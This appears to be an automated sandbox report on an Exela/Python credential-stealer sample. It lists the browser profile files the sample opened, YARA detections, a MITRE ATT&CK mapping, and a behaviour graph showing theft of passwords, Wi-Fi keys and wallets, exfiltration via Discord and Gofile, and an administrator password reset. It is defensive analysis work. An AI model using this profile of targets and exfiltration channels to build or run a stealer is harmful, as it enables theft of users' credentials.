            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.defaultJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackupsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archivedJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_stateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareportingJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500Jump to behavior
            Yara detected Generic Python Stealer
            Source: Yara matchFile source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Source: Yara matchFile source: 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Exela Stealer
            Source: Yara matchFile source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Yara detected Python Stealer
            Source: Yara matchFile source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Yara detected Generic Python Stealer
            Source: Yara matchFile source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D12B5D bind,WSAGetLastError,2_2_00007FFD93D12B5D

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		331
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		2
            Disable or Modify Tools            		1
            OS Credential Dumping            		12
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            Data Encrypted for Impact
            CredentialsDomainsDefault Accounts2
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		11
            Deobfuscate/Decode Files or Information            		1
            GUI Input Capture            		2
            System Network Connections Discovery            		Remote Desktop Protocol3
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts122
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Windows Service            		21
            Obfuscated Files or Information            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            GUI Input Capture            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Service Execution            		Login Hook11
            Process Injection            		11
            Software Packing            		NTDS45
            System Information Discovery            		Distributed Component Object Model1
            Clipboard Data            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            PowerShell            		Network Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets561
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials2
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Valid Accounts            		DCSync141
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection            		/etc/passwd and /etc/shadow1
            Remote System Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing31
            System Network Configuration Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543665 Sample: SecuriteInfo.com.FileRepMal... Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 81 store1.gofile.io 2->81 83 ip-api.com 2->83 85 3 other IPs or domains 2->85 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 Sigma detected: Capture Wi-Fi password 2->105 107 8 other signatures 2->107 10 SecuriteInfo.com.FileRepMalware.22561.28030.exe 60 2->10         started        signatures3 process4 file5 65 C:\Users\...\_quoting_c.cp310-win_amd64.pyd, PE32+ 10->65 dropped 67 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 10->67 dropped 69 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 10->69 dropped 71 30 other files (29 malicious) 10->71 dropped 125 Modifies the windows firewall 10->125 127 Tries to harvest and steal WLAN passwords 10->127 129 Gathers network related connection and port information 10->129 131 Potentially malicious time measurement code found 10->131 14 SecuriteInfo.com.FileRepMalware.22561.28030.exe 107 10->14         started        signatures6 process7 dnsIp8 87 ip-api.com 208.95.112.1, 49721, 80 TUT-ASUS United States 14->87 89 discord.com 162.159.136.232, 443, 49766, 49767 CLOUDFLARENETUS United States 14->89 91 4 other IPs or domains 14->91 73 C:\Users\user\AppData\Local\...xela.exe, PE32+ 14->73 dropped 75 C:\Users\user\AppData\...\ZQIXMVQGAH.xlsx, ASCII 14->75 dropped 77 C:\Users\user\AppData\...\PWCCAWLGRE.jpg, ASCII 14->77 dropped 79 8 other malicious files 14->79 dropped 93 Found many strings related to Crypto-Wallets (likely being stolen) 14->93 95 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->95 97 Tries to harvest and steal browser information (history, passwords, etc) 14->97 99 3 other signatures 14->99 19 cmd.exe 1 14->19         started        22 cmd.exe 14->22         started        24 cmd.exe 1 14->24         started        26 15 other processes 14->26 file9 signatures10 process11 signatures12 109 Encrypted powershell cmdline option found 19->109 111 Bypasses PowerShell execution policy 19->111 113 Uses netstat to query active network connections and open ports 19->113 123 3 other signatures 19->123 28 conhost.exe 19->28         started        115 Overwrites the password of the administrator account 22->115 117 Gathers network related connection and port information 22->117 119 Performs a network lookup / discovery via ARP 22->119 30 systeminfo.exe 22->30         started        33 net.exe 22->33         started        35 net.exe 22->35         started        43 16 other processes 22->43 37 WMIC.exe 1 24->37         started        39 conhost.exe 24->39         started        121 Tries to harvest and steal WLAN passwords 26->121 41 cmd.exe 26->41         started        45 28 other processes 26->45 process13 signatures14 133 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 30->133 47 WmiPrvSE.exe 30->47         started        135 Overwrites the password of the administrator account 33->135 49 net1.exe 33->49         started        51 net1.exe 35->51         started        137 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 37->137 139 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->139 53 chcp.com 41->53         started        55 quser.exe 43->55         started        57 net1.exe 43->57         started        59 net1.exe 43->59         started        61 net1.exe 43->61         started        63 chcp.com 45->63         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.FileRepMalware.22561.28030.exe50%ReversingLabsWin64.Adware.RedCap
            SecuriteInfo.com.FileRepMalware.22561.28030.exe100%AviraHEUR/AGEN.1306040

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe100%AviraHEUR/AGEN.1306040
            C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe50%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd5%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\libffi-7.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\libssl-1_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pyd0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            http://ip-api.com/json0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            discord.com
            		162.159.136.232
            		truefalse
              		unknown
              ip-api.com
              		208.95.112.1
              		truefalse
                		unknown
                store1.gofile.io
                		45.112.123.227
                		truefalse
                  		unknown
                  api.gofile.io
                  		45.112.123.126
                  		truefalse
                    		unknown
                    198.187.3.20.in-addr.arpa
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://ip-api.com/jsonfalse
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://account.riotgames.com/api/account/v1/userSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpfalse
                        		unknown
                        https://accounts.reddit.com/api/access_tokenSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446094364.0000018B48C90000.00000004.00001000.00020000.00000000.sdmpfalse
                            		unknown
                            https://github.com/pyca/cryptography/issues/8996SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmpfalse
                              		unknown
                              https://go.microsoft.copowershell.exe, 00000051.00000002.2338573080.00000260D91D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://github.com/python-attrs/attrs/issues/251SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2443973271.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433238655.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2432689144.0000018B4797A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://klaviyo.com/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                    		unknown
                                    https://tiktok.com/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://github.com/aio-libs/aiohttp/discussions/6044SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://python.orgSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://python.org/dev/peps/pep-0263/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmpfalse
                                            		unknown
                                            https://www.attrs.org/en/24.2.0/_static/sponsors/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                              		unknown
                                              http://python.org:80SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440123869.0000018B4511E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434927135.0000018B4511D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
